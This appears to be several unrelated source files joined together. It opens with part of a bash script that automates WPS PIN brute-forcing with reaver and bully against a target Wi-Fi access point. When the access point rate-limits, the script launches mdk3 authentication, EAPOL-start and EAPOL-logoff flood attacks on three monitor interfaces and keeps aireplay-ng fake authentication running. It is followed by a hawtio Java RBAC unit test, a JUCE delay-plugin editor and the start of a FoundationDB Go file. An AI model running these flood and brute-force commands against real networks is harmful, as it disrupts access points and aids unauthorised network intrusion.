##########################################################################
# Runs reaver forever, restarting it whenever it exits, and mirrors its
# output into /etc/reaver_tmp.txt for the watchdog/tail functions.
# Global read: REAVER_COMMAND_LINE (built elsewhere in the script).
REAVER () {
    while true; do
        # Auto-answer reaver's "restore session?" prompt with "y" and
        # append everything it prints to the shared log file.
        echo y | $REAVER_COMMAND_LINE | tee -a /etc/reaver_tmp.txt > /dev/null
        # Truncate the log between runs so stale warning lines do not
        # retrigger the mdk3 watchdog.
        echo "Please Wait..." > /etc/reaver_tmp.txt 2> /dev/null
        sleep 5
    done
}
###########################################################################
# Runs bully forever, restarting it whenever it exits, and mirrors its
# output into /etc/bully_tmp.txt for the watchdog/tail functions.
# Global read: BULLY_COMMAND_LINE (built elsewhere in the script).
BULLY () {
    while true; do
        # stdbuf disables stdout/stderr buffering so lockout messages
        # land in the log file the moment bully prints them.
        stdbuf -o0 -e0 $BULLY_COMMAND_LINE | tee -a /etc/bully_tmp.txt > /dev/null
        # Truncate the log between runs so stale lockout lines do not
        # retrigger the mdk3 watchdog.
        echo "Please Wait..." > /etc/bully_tmp.txt 2> /dev/null
        sleep 5
    done
}
###########################################################################
# Watchdog pairing mdk3 floods with reaver. Polls /etc/reaver_tmp.txt and:
#  - while reaver reports AP rate limiting and no mdk3 is running, floods
#    the AP on all three monitor interfaces with the attack selected in
#    MDK3_MAIN_MENU (one gnome-terminal per interface);
#  - on 25 successive EAPOL start failures, suspends reaver, floods for
#    60 seconds, then resumes it;
#  - once the AP is no longer rate limiting, kills all mdk3 instances.
# Globals read: MON1 MON2 MON3 MAC ESSID TARGET_STATION MDK3_MAIN_MENU_OPTION.
# Fix: the third gnome-terminal invocation previously had a stray '-e'
# before --geometry, so the third mdk3 instance never started.
function MDK3_FOR_REAVER {
while :; do
# Snapshot running mdk3 processes and the latest reaver log lines.
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
# AP is rate limiting and no flood is running yet: start one terminal
# per monitor interface running the selected mdk3 attack.
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1" ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "mdk3 $MON3 a -a $MAC -s 200";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
done
# Reaver reported 25 successive EAPOL start failures: suspend it and
# flood hard for 60 seconds (timeout-limited mdk3) before resuming.
while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
killall -STOP reaver
echo -e "\e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 seconds!\e[0m" >> /etc/reaver_tmp.txt ;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 60;
fi
killall -CONT reaver;
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
MDK3_KILLALL_1=`ps -A|grep mdk3`
done
# AP no longer rate limiting (or the failure flood just ran): stop all
# mdk3 instances so the channel is free for reaver again.
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" ]; then
killall mdk3 2> /dev/null
fi
done
}
###########################################################################
# Watchdog pairing mdk3 floods with bully. Polls /etc/bully_tmp.txt and:
#  - while bully reports a WPS lockout and no mdk3 is running, floods the
#    AP on all three monitor interfaces with the attack selected in
#    MDK3_MAIN_MENU (one gnome-terminal per interface);
#  - once the lockout clears, kills all mdk3 instances.
# Globals read: MON1 MON2 MON3 MAC ESSID TARGET_STATION MDK3_MAIN_MENU_OPTION.
# Fixes: stray '-e' before --geometry on the third gnome-terminal (third
# mdk3 instance never started); the EAPOL log-off branch mistakenly used
# 'timeout 60' in this quick-response loop, unlike its siblings and the
# reaver variant — the flood is meant to run until the lockout clears.
function MDK3_FOR_BULLY {
while :; do
# Snapshot running mdk3 processes and the latest bully log line.
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
# AP is locked and no flood is running yet: start one terminal per
# monitor interface running the selected mdk3 attack.
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WPS lockout reported, sleeping for 10 seconds ..." -a -z "$MDK3_KILLALL_1" ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progress' -e "mdk3 $MON3 a -a $MAC -s 200";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
done
# Lockout cleared: stop all mdk3 instances so bully gets the channel back.
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WPS lockout reported, sleeping for 10 seconds ..." ]; then
killall mdk3 2> /dev/null
fi
done
}
########################################################################################################################
# Console view for the reaver run: alternates between the reaver log
# (10 s) and the aireplay log (5 s) on the same terminal, and restarts
# aireplay when the AP has pushed it into shared-key authentication.
TAIL_FOR_REAVER () {
    while true; do
        clear
        timeout 10 tail -n 100 -f /etc/reaver_tmp.txt 2> /dev/null
        clear
        sleep 1
        # "Switching to shared key authentication" means the fake
        # association is stuck; kill aireplay-ng so AIREPLAY restarts it.
        AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
        if [ -n "$AIREPLAY_RESET" ]; then
            killall aireplay-ng
        fi
        timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
    done
}
###########################################################################
# Console view for the bully run: alternates between the bully log (10 s)
# and the aireplay log (5 s) on the same terminal, and restarts aireplay
# when the AP has pushed it into shared-key authentication.
TAIL_FOR_BULLY () {
    while true; do
        clear
        timeout 10 tail -n 100 -f /etc/bully_tmp.txt 2> /dev/null
        clear
        sleep 1
        # "Switching to shared key authentication" means the fake
        # association is stuck; kill aireplay-ng so AIREPLAY restarts it.
        AIREPLAY_RESET=`cat '/etc/aireplay_tmp.txt'|grep -w 'Switching to shared key authentication'`
        if [ -n "$AIREPLAY_RESET" ]; then
            killall aireplay-ng
        fi
        timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
    done
}
###########################################################################
# Keeps a fake authentication (-1) running against the target AP so the
# cracker always has an association; restarts aireplay-ng whenever it
# exits. Output is mirrored to /etc/aireplay_tmp.txt for the tail
# functions, which also kill this aireplay-ng instance to force a reset.
# Globals read: MON1 MAC ESSID.
AIREPLAY () {
    while true; do
        # -q3 sends keep-alives every 3 s; log everything for monitoring.
        aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -q3 2>> /dev/null | tee /etc/aireplay_tmp.txt > /dev/null
        # Marker line appended between runs.
        echo "Please Wait..." >> /etc/aireplay_tmp.txt 2> /dev/null
        sleep 1
    done
}
###########################################################################
# Script entry point: show the mdk3 flood-attack selection menu.
MDK3_MAIN_MENU
|
/*
* Copyright 2016 Red Hat, Inc.
*
* Red Hat licenses this file to you under the Apache License, version
* 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package io.hawt.web;
import io.hawt.jmx.JMXSecurity;
import org.jolokia.config.Configuration;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.management.InstanceNotFoundException;
import javax.management.ObjectName;
import java.util.Arrays;
import static org.hamcrest.CoreMatchers.is;
import static org.junit.Assert.assertThat;
/**
 * Unit tests for {@code RBACRestrictor}, the Jolokia restrictor that
 * delegates operation and attribute access checks to the hawtio
 * JMXSecurity MBean.
 */
public class RBACRestrictorTest {
private static final Logger LOG = LoggerFactory.getLogger(RBACRestrictorTest.class);
// Mock security MBean registered before each test, unregistered after.
private JMXSecurity mockJMXSecurity;
@Before
public void setUp() throws Exception {
// Register the mock so the restrictor finds a JMXSecurity MBean.
this.mockJMXSecurity = new MockJMXSecurity();
this.mockJMXSecurity.init();
}
@After
public void tearDown() throws Exception {
// Unregister the MBean to keep tests isolated from each other.
this.mockJMXSecurity.destroy();
this.mockJMXSecurity = null;
}
/**
 * Without any JMXSecurity MBean registered, the restrictor must allow
 * everything (RBAC effectively disabled).
 */
@Test
public void noJMXSecurityMBean() throws Exception {
// make sure no JMXSecurity MBean is registered
this.mockJMXSecurity.destroy();
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "anyMethod(java.lang.String)"), is(true));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "VmName"), is(true));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Runtime"), "VmName"), is(true));
}
/**
 * Operation checks follow MockJMXSecurity.canInvoke; a thrown exception
 * or a missing MBean instance results in denial, and signatures with
 * argument types are matched against the argTypes overload.
 */
@Test
public void isOperationAllowed() throws Exception {
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "allowed()"), is(true));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "notAllowed()"), is(false));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "error()"), is(false));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=NoSuchType"), "noInstance()"), is(false));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "allowed(boolean,long,java.lang.String)"), is(true));
assertThat(restrictor.isOperationAllowed(new ObjectName("hawtio:type=Test"), "notAllowed(boolean,long,java.lang.String)"), is(false));
}
/**
 * Attribute reads: the mock allows getVmName and isVerbose, so only the
 * corresponding attributes (VmName, Verbose) are readable.
 */
@Test
public void isAttributeReadAllowed() throws Exception {
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "VmName"), is(true));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Memory"), "Verbose"), is(true));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "VmVersion"), is(false));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("java.lang:type=Runtime"), "xxx"), is(false));
assertThat(restrictor.isAttributeReadAllowed(new ObjectName("hawtio:type=NoSuchType"), "Whatever"), is(false));
}
/**
 * Attribute writes: the mock allows setVerbose(boolean) only, so only
 * the Verbose attribute is writable.
 */
@Test
public void isAttributeWriteAllowed() throws Exception {
RBACRestrictor restrictor = new RBACRestrictor(new Configuration());
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Memory"), "Verbose"), is(true));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Runtime"), "VmVersion"), is(false));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("java.lang:type=Runtime"), "xxx"), is(false));
assertThat(restrictor.isAttributeWriteAllowed(new ObjectName("hawtio:type=NoSuchType"), "Whatever"), is(false));
}
/**
 * JMXSecurity stand-in with a hard-coded allow-list used by the tests
 * above; registered under its own ObjectName so it never clashes with a
 * real JMXSecurity MBean.
 */
private class MockJMXSecurity extends JMXSecurity {
@Override
public boolean canInvoke(String objectName, String methodName) throws Exception {
// No-signature variant: deny; tests exercise the argTypes overload.
return false;
}
@Override
public boolean canInvoke(String objectName, String methodName, String[] argTypes) throws Exception {
LOG.debug("{}, {}, {}", objectName, methodName, Arrays.asList(argTypes));
if (argTypes.length == 0) {
if ("hawtio:type=Test".equals(objectName) && "allowed".equals(methodName)) {
return true;
}
if ("hawtio:type=Test".equals(objectName) && "error".equals(methodName)) {
// Simulates a failing security check; restrictor must deny.
throw new Exception();
}
if ("hawtio:type=NoSuchType".equals(objectName) && "noInstance".equals(methodName)) {
// Simulates a missing MBean; restrictor must deny.
throw new InstanceNotFoundException(objectName);
}
if ("java.lang:type=Runtime".equals(objectName) && "getVmName".equals(methodName)) {
return true;
}
if ("java.lang:type=Memory".equals(objectName) && "isVerbose".equals(methodName)) {
return true;
}
} else {
if ("hawtio:type=Test".equals(objectName) && "allowed".equals(methodName) && argTypes.length == 3
&& "boolean".equals(argTypes[0]) && "long".equals(argTypes[1]) && "java.lang.String".equals(argTypes[2])) {
return true;
}
if ("java.lang:type=Memory".equals(objectName) && "setVerbose".equals(methodName) && argTypes.length == 1
&& "boolean".equals(argTypes[0])) {
return true;
}
}
return false;
}
@Override
protected String getDefaultObjectName() {
return "hawtio:type=security,area=jmx,name=MockJMXSecurity";
}
}
}
|
<filename>PitchedDelay/Source/PluginEditor.cpp
/*
==============================================================================
This file was auto-generated by the Introjucer!
It contains the basic startup code for a Juce application.
==============================================================================
*/
#include "PluginProcessor.h"
#include "PluginEditor.h"
//==============================================================================
// Builds the plugin GUI: one tab per delay tap, a delay overview graph,
// dry/master volume sliders, a tooltip toggle and preset controls. Also
// seeds the on-disk preset file from the bundled factory presets on first
// run, and starts the 100 ms timer that syncs the UI with the processor.
PitchedDelayAudioProcessorEditor::PitchedDelayAudioProcessorEditor (PitchedDelayAudioProcessor* ownerFilter)
: AudioProcessorEditor (ownerFilter),
tabs(TabbedButtonBar::TabsAtTop, ownerFilter),
addPreset("+", "Add new preset"),
removePreset("-", "Remove current preset from list")
{
// Install the custom look and feel globally; reset in the destructor.
LookAndFeel::setDefaultLookAndFeel(&lookAndFeel);
addAndMakeVisible(&tabs);
tabs.setTabBarDepth(25);
// One tab per delay tap; the editor listens for their action messages.
for (int i=0; i<NUMDELAYTABS; ++i)
{
const String tabName("Delay Tap " + String(i+1));
PitchedDelayTab* delay = new PitchedDelayTab(getProcessor(), i);
delays.add(delay);
tabs.addTab(tabName, Colour(0xFFC0C0C0), delays.getLast(), false);
delay->addActionListener(this);
}
// Overview graph showing all delay taps at once.
addAndMakeVisible(graph = new DelayGraph(delays, ownerFilter));
// Dry and master volume sliders: -60..+12 dB range, 0.1 dB steps.
addAndMakeVisible(&dryVolume);
dryVolume.setRange(-60, 12, 0.1);
dryVolume.setSliderStyle(Slider::LinearVertical);
dryVolume.setTextBoxStyle(Slider::TextBoxBelow, false, 50, 20);
dryVolume.addListener(this);
addAndMakeVisible(&masterVolume);
masterVolume.setRange(-60, 12, 0.1);
masterVolume.setSliderStyle(Slider::LinearVertical);
masterVolume.setTextBoxStyle(Slider::TextBoxBelow, false, 50, 20);
masterVolume.addListener(this);
// Tooltip toggle plus the preset add/remove buttons and selector.
addAndMakeVisible(&showTooltips);
showTooltips.setButtonText("Show tooltips");
showTooltips.addListener(this);
addAndMakeVisible(&addPreset);
addPreset.addListener(this);
addAndMakeVisible(&removePreset);
removePreset.addListener(this);
addAndMakeVisible(&presetList);
presetList.addListener(this);
tooltipWindow = new TooltipWindow();
{
// Seed the user preset file from the factory presets on first run.
File presetFile(File::getSpecialLocation(File::userApplicationDataDirectory).getChildFile("lkjb").getChildFile("PitchedDelay").getChildFile("presets.xml"));
if (! presetFile.existsAsFile())
{
presetFile.getParentDirectory().createDirectory();
presetFile.replaceWithText(String(BinaryData::factorypresets_xml, BinaryData::factorypresets_xmlSize));
}
presetManager = new PresetManager(ownerFilter, presetFile);
updatePresets();
}
setSize (600, 435);
// Periodic sync of the UI with the processor state (timerCallback).
startTimer(100);
}
// Resets the global look and feel installed by the constructor before the
// editor's members (including the LookAndFeel instance) are destroyed.
PitchedDelayAudioProcessorEditor::~PitchedDelayAudioProcessorEditor()
{
LookAndFeel::setDefaultLookAndFeel(nullptr);
}
// Lays out the child components: tooltip toggle and preset controls in
// the top bar, the overview graph below, then the tab area with the
// dry/master volume sliders to its right.
void PitchedDelayAudioProcessorEditor::resized()
{
    const int w = getWidth();

    // Top bar: toggle on the left, preset controls right-aligned.
    showTooltips.setBounds(10, 0, 100, 20);
    presetList.setBounds(w - 360, 0, 300, 20);
    addPreset.setBounds(w - 60, 0, 30, 20);
    removePreset.setBounds(w - 30, 0, 30, 20);

    // Delay overview graph underneath the top bar.
    graph->setBounds(0, 20, 600, 100);

    // Per-tap editors and the two volume faders.
    tabs.setBounds(0, 120, 500, 315);
    dryVolume.setBounds(502, 140, 46, 265);
    masterVolume.setBounds(552, 140, 46, 265);
}
//==============================================================================
// Paints the flat grey background and the static captions for the volume
// faders and the preset selector.
void PitchedDelayAudioProcessorEditor::paint (Graphics& g)
{
    g.fillAll (Colour(0xFFB0B0B0));

    g.setFont(Font(14.f));
    g.setColour(Colours::black);

    // Captions above the "Dry" and "Master" faders.
    const int captionY = 120;
    g.drawText("Dry", 500, captionY, 50, 20, Justification::centred, false);
    g.drawText("Master", 550, captionY, 50, 20, Justification::centred, false);

    // Right-aligned caption in front of the preset combo box.
    g.drawText("Presets", 0, 0, getWidth()-370, 20, Justification::centredRight, false);
}
// Timer callback (every 100 ms): mirrors processor state into the UI —
// the selected tab, the dry/master slider positions, the tooltip toggle
// and the "*" enabled marker on each tab name.
void PitchedDelayAudioProcessorEditor::timerCallback()
{
PitchedDelayAudioProcessor* Proc = getProcessor();
// Follow tab changes requested from the processor side.
const int currentTab = Proc->currentTab;
if (currentTab != tabs.getCurrentTabIndex() && currentTab >= 0)
tabs.setCurrentTabIndex(currentTab, false);
// Parameters store linear gain; the sliders show dB offset by +12.
dryVolume.setValue(12. + Decibels::gainToDecibels(Proc->getParameter(Proc->getNumDelayParameters() + PitchedDelayAudioProcessor::kDryVolume)));
masterVolume.setValue(12. + Decibels::gainToDecibels(Proc->getParameter(Proc->getNumDelayParameters() + PitchedDelayAudioProcessor::kMasterVolume)));
showTooltips.setToggleState(Proc->showTooltips, dontSendNotification);
// Create/destroy the shared tooltip window to match the toggle.
// NOTE(review): assigning 0 presumably deletes the window via a smart
// pointer (e.g. ScopedPointer) — confirm tooltipWindow's declared type.
if (Proc->showTooltips && tooltipWindow == nullptr)
tooltipWindow = new TooltipWindow();
else if (! Proc->showTooltips && tooltipWindow != nullptr)
tooltipWindow = 0;
// Prefix enabled taps with '*' in the tab bar.
for (int i=0; i<tabs.getNumTabs(); ++i)
{
const String tabName(String(Proc->getDelay(i)->isEnabled() ? "*" : "") + "Delay Tap " + String(i+1));
tabs.setTabName(i, tabName);
}
}
// Handles "Tab<idx>:<ParamName>:<Value>" action messages sent by the
// per-tap editor components: maps the textual parameter name onto the
// DelayTabDsp parameter index and forwards the (normalized) value to the
// processor as a host-notifying parameter change.
void PitchedDelayAudioProcessorEditor::actionListenerCallback(const String& message)
{
PitchedDelayAudioProcessor* Proc = getProcessor();
// Split the message into its three colon-separated tokens.
StringArray cmds;
const int numCmds = cmds.addTokens(message, ":", "");
if (numCmds == 3 && cmds[0].startsWith("Tab"))
{
const String tab(cmds[0]);
const String param(cmds[1]);
const String val(cmds[2]);
// Tap index is encoded after the "Tab" prefix.
const int delayIdx = tab.substring(3).getIntValue();
const double value = val.getDoubleValue();
int paramIdx = -1;
DelayTabDsp* dsp = Proc->getDelay(delayIdx);
jassert(dsp != 0);
// Map the parameter name to the DelayTabDsp parameter enum.
if (param == "Delay")
{
paramIdx = DelayTabDsp::kDelay;
}
else if (param == "Sync")
{
paramIdx = DelayTabDsp::kSync;
}
else if (param == "Pitch")
{
paramIdx = DelayTabDsp::kPitch;
}
else if (param == "PitchType")
{
paramIdx = DelayTabDsp::kPitchType;
}
else if (param == "Feedback")
{
paramIdx = DelayTabDsp::kFeedback;
}
else if (param == "EqFreq")
{
paramIdx = DelayTabDsp::kFilterFreq;
}
else if (param == "EqQ")
{
paramIdx = DelayTabDsp::kFilterQ;
}
else if (param == "EqGain")
{
paramIdx = DelayTabDsp::kFilterGain;
}
else if (param == "Volume")
{
paramIdx = DelayTabDsp::kVolume;
}
else if (param == "Pan")
{
paramIdx = DelayTabDsp::kPan;
}
else if (param == "EqType")
{
paramIdx = DelayTabDsp::kFilterType;
}
else if (param == "PrePitch")
{
paramIdx = DelayTabDsp::kPrePitch;
}
else if (param == "Enabled")
{
paramIdx = DelayTabDsp::kEnabled;
}
else if (param == "Mode")
{
paramIdx = DelayTabDsp::kMode;
}
else if (param == "Predelay")
{
paramIdx = DelayTabDsp::kPreDelay;
}
else if (param == "PredelayVol")
{
paramIdx = DelayTabDsp::kPreDelayVol;
}
else
{
// Unknown parameter name — programmer error in the sender.
jassertfalse;
}
if (paramIdx >= 0)
{
// Host parameters are laid out per tap: tap * kNumParameters + param.
const int procParem = paramIdx + delayIdx * DelayTabDsp::kNumParameters;
Proc->setParameterNotifyingHost(procParem, dsp->plainToNormalized(paramIdx, value));
}
}
}
// Forwards dry/master fader moves to the processor. Sliders show dB
// offset by +12; the parameters store linear gain.
void PitchedDelayAudioProcessorEditor::sliderValueChanged (Slider* slider)
{
    PitchedDelayAudioProcessor* proc = getProcessor();

    const bool isDry = (slider == &dryVolume);
    if (! isDry && slider != &masterVolume)
        return; // not one of ours

    const int paramIndex = proc->getNumDelayParameters()
        + (isDry ? PitchedDelayAudioProcessor::kDryVolume
                 : PitchedDelayAudioProcessor::kMasterVolume);

    proc->setParameterNotifyingHost(paramIndex,
        Decibels::decibelsToGain((float) slider->getValue() - 12.f));
}
// Handles the tooltip toggle and the preset add/remove buttons.
// Adding: asks for a name (modal), optionally confirms overwrite, stores
// the preset and rebuilds the list. Removing: confirms, deletes, rebuilds.
void PitchedDelayAudioProcessorEditor::buttonClicked (Button* button)
{
if (button == &showTooltips)
{
// Persist the toggle in the processor; timerCallback applies it.
getProcessor()->showTooltips = showTooltips.getToggleState();
}
else if (button == &addPreset)
{
AlertWindow aw("Add Preset", "Add preset", AlertWindow::QuestionIcon, this);
aw.addTextEditor("name", presetList.getText(), "Preset name");
aw.addButton("OK", 1, KeyPress(KeyPress::returnKey));
aw.addButton("Cancel", 2, KeyPress(KeyPress::escapeKey));
// Modal dialog; return value 1 means OK.
if (aw.runModalLoop() == 1)
{
const String presetName(aw.getTextEditor("name")->getText());
StringArray presetNames(presetManager->getPresetNames());
if (presetName.isEmpty())
{
AlertWindow::showMessageBox(AlertWindow::WarningIcon, "Invalid name", "No Preset name specified", "OK");
return;
}
// Existing name: ask before overwriting.
if (presetNames.contains(presetName))
{
if (! AlertWindow::showOkCancelBox(AlertWindow::QuestionIcon, "Overwrite Preset", "Overwrite " + presetName.quoted() + "?", "Overwrite", "Cancel", this))
return;
}
presetManager->storePreset(presetName);
updatePresets();
}
}
else if (button == &removePreset)
{
const String presetName(presetList.getText());
if (presetName.isEmpty())
return;
// Confirm before deleting the selected preset.
if (! AlertWindow::showOkCancelBox(AlertWindow::QuestionIcon, "Remove Preset", "Remove " + presetName.quoted() + "?", "Remove", "Cancel", this))
return;
presetManager->removePreset(presetName, true);
updatePresets();
}
}
// Loads the preset whose name is currently selected in the preset combo box.
void PitchedDelayAudioProcessorEditor::comboBoxChanged (ComboBox* comboBoxThatHasChanged)
{
	if (comboBoxThatHasChanged == &presetList)
	{
		const String presetName(presetList.getText());
		presetManager->loadPreset(presetName);
	}
}
void PitchedDelayAudioProcessorEditor::updatePresets()
{
StringArray presets(presetManager->getPresetNames());
presets.sort(true);
presetList.clear();
for (int i=0; i<presets.size(); ++i)
presetList.addItem(presets[i], i+1);
presetList.setSelectedId(0);
}
|
/*
* lock_client.go
*
* This source file is part of the FoundationDB open source project
*
* Copyright 2021 Apple Inc. and the FoundationDB project authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package fdbclient
import (
"fmt"
"time"
fdbtypes "github.com/FoundationDB/fdb-kubernetes-operator/api/v1beta1"
